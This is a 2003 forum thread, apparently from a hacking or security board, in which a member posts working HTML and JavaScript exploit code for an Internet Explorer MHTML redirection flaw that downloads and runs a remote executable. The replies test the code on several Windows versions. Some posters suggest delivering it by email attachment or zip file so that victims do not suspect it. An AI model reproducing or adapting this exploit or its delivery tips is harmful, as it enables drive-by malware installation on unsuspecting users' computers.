Forums: Newest Ie Vulnerability - Forums

Jump to content

  • (2 Pages)
  • +
  • 1
  • 2
  • You cannot start a new topic
  • You cannot reply to this topic

Newest Ie Vulnerability

#1 User is offline   gsicht 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 91
  • Joined: 09-October 03

Posted 28 November 2003 - 06:23 AM

advisory:
http://packetstormse.../mhtmlredir.txt

do you know this vulnerbility? i've found some html code for this:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <script>
WaitForDocumentCached_TIME=100;

function LaunchRemoteExe_Step2()
	{
  //One more fresh action is present for more stable performance
  for(i=1;i<=2;i++)	
 	 w.document.execCommand("Refresh");
	}
	
function LaunchRemoteExe(ExeUrl)	
	{
  w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");
  w.document.write("<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111113' 	 CODEBASE='mhtml:file://C:\NO_SUCH_MHT.MHT!" + ExeUrl + "'>");
  setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME);
	}

LaunchRemoteExe("http://127.0.0.1/EXE.EXE") <!-- and end it with -->
  </script>

</head>
<body>
</body>
</html>

it will download and execute exe.exe from http://127.0.0.1/.
can someone test this code. i dont have the ie :rolleyes:
0

#2 Guest_liquidSilver_*

  • Group: Guests

Posted 28 November 2003 - 07:58 AM

Hello..

I will test it locally. Be right back with results.

Regards,
LiquidSilver.
0

#3 Guest_liquidSilver_*

  • Group: Guests

Posted 28 November 2003 - 08:05 AM

No results at all.. Hmm.. I try some other methods.

Regards,
LiquidSilver.
0

#4 User is offline   gsicht 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 91
  • Joined: 09-October 03

Posted 28 November 2003 - 08:16 AM

i think its a very interesting bug.
here is a harmless example how to exploit:
http://www.safecente...Demo/index.html
0

#5 Guest_liquidSilver_*

  • Group: Guests

Posted 28 November 2003 - 08:31 AM

Hello..

Quote from the site:

Quote

This demo assumes
1.WinXp or Win2k3 is installed at C:\WINDOWS.
2.A small web page(less than 3 kbyte) can be downloaded within 4 seconds.


I am currently running Win98 on this computer, I will try it on my other Win2k computer later on.

Yes, it can be a very intresting code - but what did I just download?! PayLoad.exe?! uhm..?!

Regards,
LiquidSilver.
0

#6 Guest_liquidSilver_*

  • Group: Guests

Posted 28 November 2003 - 08:34 AM

Ah, I checked the exe file, it was emtpy.. hehe. :rolleyes:
0

#7 User is offline   tareq 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 34
  • Joined: 07-September 03

Posted 28 November 2003 - 08:50 AM

it wont work mate
i tested it on my self winxp sp1 5.1.2600
0

#8 Guest_Axl_*

  • Group: Guests

Posted 29 November 2003 - 01:20 AM

the second one looks nice !

thanks !
0

#9 User is offline   gogu258 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 138
  • Joined: 03-September 03

Post icon  Posted 30 November 2003 - 04:34 PM

It works on W2K (Windows 2000) but only local, I think it should work on XP and 2003 , little research but with good result on W2K. It download exe file and run but as I told you before only if you open page on your system.
GoguZ.Com - Security Portal
0

#10 User is offline   extreme 

  • Specialist
  • Icon
  • Group: Specialist
  • Posts: 582
  • Joined: 02-September 03

Posted 01 December 2003 - 05:00 PM

Well, it wasn't ment to work remotely. But it should be enough too. Just attach HTML file in email.. Who would think that HTML file could be infected..?!?
WUTranslink
0

#11 User is offline   jawz 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 29
  • Joined: 03-December 03

Posted 03 December 2003 - 01:29 PM

The exploit works on my Windows XP. Fortunately, McAfee is able to detect et neutralize the exploit (Exploit-CodeBase).
0

#12 User is offline   aiboforcen 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 34
  • Joined: 17-October 03

Posted 04 December 2003 - 07:17 AM

www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.html
This exploit works fine for me to. But when i upload the exploit to another asp host it wont work anymore. I think its very strange because i havent changed the code and I have tried atleast 3 different web hosts wich supporte asp.
Anyone got any sulotion ? :blink:
0

#13 User is offline   mnemonix 

  • Private
  • Icon
  • Group: Members
  • Posts: 3
  • Joined: 22-August 03

Posted 08 December 2003 - 03:52 AM

Works on xp sp1

Some nice work
0

#14 User is offline   gogu258 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 138
  • Joined: 03-September 03

Post icon  Posted 08 December 2003 - 12:16 PM

There you have another problem, if your target doesn't use Outlook or something like that....like Yahoo email, your attachment will be show as web page, but remote not local....so you have to use it as zip file.....
0

#15 User is offline   FiStEh 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 58
  • Joined: 30-November 03

Posted 09 December 2003 - 08:46 AM

F-secure anti-virus picked up the malicious code. Do'h that wouldve been nice :angry:
FiStEy
0
  • (2 Pages)
  • +
  • 1
  • 2
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting